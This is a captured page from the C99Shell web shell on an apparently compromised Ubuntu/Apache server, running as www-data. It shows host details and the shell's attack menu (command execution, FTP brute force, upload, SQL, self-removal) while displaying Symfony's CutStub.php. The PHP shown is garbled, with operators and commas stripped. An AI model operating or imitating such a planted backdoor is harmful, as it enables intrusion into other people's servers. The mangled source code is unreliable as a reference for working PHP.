!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/queuepro/vendor/symfony/var-dumper/Caster/   drwxrwxr-x
Free 13.26 GB of 57.97 GB (22.88%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     CutStub.php (1.89 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of the Symfony package.
 *
 * (c) Fabien Potencier <fabien@symfony.com>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Symfony\Component\VarDumper\Caster;

use 
Symfony\Component\VarDumper\Cloner\Stub;

/**
 * Represents the main properties of a PHP variable, pre-casted by a caster.
 *
 * @author Nicolas Grekas <p@tchwork.com>
 */
class CutStub extends Stub
{
    public function 
__construct(mixed $value)
    {
        
$this->value $value;

        switch (
\gettype($value)) {
            case 
'object':
                
$this->type self::TYPE_OBJECT;
                
$this->class \get_class($value);

                if (
$value instanceof \Closure) {
                    
ReflectionCaster::castClosure($value, [], $thistrueCaster::EXCLUDE_VERBOSE);
                }

                
$this->cut = -1;
                break;

            case 
'array':
                
$this->type self::TYPE_ARRAY;
                
$this->class self::ARRAY_ASSOC;
                
$this->cut $this->value \count($value);
                break;

            case 
'resource':
            case 
'unknown type':
            case 
'resource (closed)':
                
$this->type self::TYPE_RESOURCE;
                
$this->handle = (int) $value;
                if (
'Unknown' === $this->class = @get_resource_type($value)) {
                    
$this->class 'Closed';
                }
                
$this->cut = -1;
                break;

            case 
'string':
                
$this->type self::TYPE_STRING;
                
$this->class preg_match('//u'$value) ? self::STRING_UTF8 self::STRING_BINARY;
                
$this->cut self::STRING_BINARY === $this->class \strlen($value) : mb_strlen($value'UTF-8');
                
$this->value '';
                break;
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0049 ]--